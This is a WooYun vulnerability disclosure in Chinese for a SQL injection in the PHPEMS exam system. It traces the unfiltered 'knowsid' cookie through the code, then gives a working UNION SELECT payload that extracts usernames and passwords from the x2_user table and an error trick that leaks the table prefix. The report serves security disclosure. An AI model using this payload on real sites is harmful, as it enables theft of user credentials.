PHPEMS注入一处(Demo测试成功) | wooyun-2014-081915| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-081915

漏洞标题：PHPEMS注入一处(Demo测试成功)

漏洞作者： SLAckEr

提交时间：2014-11-06 15:02

修复时间：2015-02-04 15:04

公开时间：2015-02-04 15:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-02-04：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

过滤不严导致的注入

详细说明：

看文件 /app/exam/app.php 272-286行

public function lesson()
	{
		$action = $this->ev->url(3);
		$page = $this->ev->get('page');
		switch($action)
		{
			case 'ajax':
			switch($this->ev->url(4))
			{
				case 'questions':
				$number = $this->ev->get('number');
				if(!$number)$number = 1;
				$questid = $this->ev->getCookie('questype');
				$knowsid = $this->ev->getCookie('knowsid');
				$questions = $this->question->getRandQuestionListByKnowid($knowsid,$questid);

跟下getCookie 文件/lib/ev.cls.php 81-85行

public function getCookie($par,$nohead = 0)
    {
    	if(isset($this->cookie[CH.$par]))return $this->cookie[CH.$par];
    	elseif(isset($this->cookie[$par]) && $nohead)return $this->cookie[$par];
    	else return false;
    }

从cookie中获得参数，这里的knowsid没有处理。
然后带进了这个函数getRandQuestionListByKnowid
跟一下/app/exam/cls/question.cls.php 94-105行

public function getRandQuestionListByKnowid($knowid,$typeid)
	{
		$data = array('DISTINCT questions.questionid',array('questions','quest2knows'),array("quest2knows.qkknowsid IN ({$knowid})","quest2knows.qktype = 0","quest2knows.qkquestionid = questions.questionid","questions.questiontype = '{$typeid}'","questions.questionstatus = 1"),false,false,false);
		$sql = $this->sql->makeSelect($data);
		$r = $this->db->fetchAll($sql);
		$t = array();
		foreach($r as $p)
		{
			$t[] = $p['questionid'];
		}
		return $t;
	}

注意$data,$knowid没有单引号也没有处理。
再看下makeSelect /lib/sql.cls.php 214-282

public function makeSelect($selectors,$type = 1)
	{
		if(!is_array($selectors))return false;
		$sql = "SELECT ";
		if(!$selectors[0])$selectors[0] = "*";
		if(is_array($selectors[0]))
		{
			$sql .= rtrim(implode(',',$selectors[0]),',');
		}
		else $sql .= $selectors[0];
		$sql .= " FROM ";
		if(is_array($selectors[1]))
		{
			$tmp = NULL;
			foreach($selectors[1] as $p)
			{
				if($type)$tmp .= $this->tablepre.$p." AS ".$p.",";
				else
				$tmp .= $p." AS t ,";
			}
			$sql .= rtrim($tmp,',');
		}
		else
		{
			if($type)$sql .= $this->tablepre.$selectors[1]." AS ".$selectors[1];
			else
			$sql .= $selectors[1]." AS t";
		}
		$sql .= " WHERE ";
		if(!$selectors[2])$selectors[2] = 1;
		if(is_array($selectors[2]))
		{
			$sql .= rtrim(implode(' AND ',$selectors[2]),'AND ');
		}
		else $sql .= $selectors[2];
		if($selectors[3])
		{
			$sql .= " GROUP BY ";
			if(is_array($selectors[3]))
			{
				$sql .= rtrim(implode(',',$selectors[3]),',');
			}
			else $sql .= $selectors[3];
		}
		if($selectors[4])
		{
			$sql .= " ORDER BY ";
			if(is_array($selectors[4]))
			{
				$sql .= rtrim(implode(',',$selectors[4]),',');
			}
			else $sql .= $selectors[4];
		}
		if($selectors[5])
		{
			$sql .= " LIMIT ";
			if(is_array($selectors[5]))
			{
				$sql .= rtrim(implode(',',$selectors[5]),',');
			}
			else $sql .= $selectors[5];
		}
		elseif($selectors[5] !== false)
		{
			$sql .= " LIMIT 0,100";
		}
		return $sql;
	}

直接生成select语句的sql，没有处理。这样就导致了注入的产生。

漏洞证明：

利用过程：
首先注册个用户，开一个新考场

是免费的测试的。
然后访问
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=1
抓包

输入poc
NULL) union select concat(username,0x23,userpassword) from x2_user #(

那么如果数据库前缀改掉了肿么办？
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=
直接访问这个就行了，把number参数的值去掉，就可以爆出前缀，。。。。

官网的前缀不是x2，改掉了。通过这个方法爆出，然后上个图。

mask 区域

*****^^*****
*****38e8bc2e36df388e57c2b0.jpg*****

还有问题的函数
getRandQuestionRowsListByKnowid
getKnowsBySubjectAndAreaid
getRandQuestionList
没在仔细看了，睡觉了。。

修复方案：

对cookie传递进来的参数过滤，对带入sql查询的变量从函数上过滤。

版权声明：转载请注明来源 SLAckEr@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞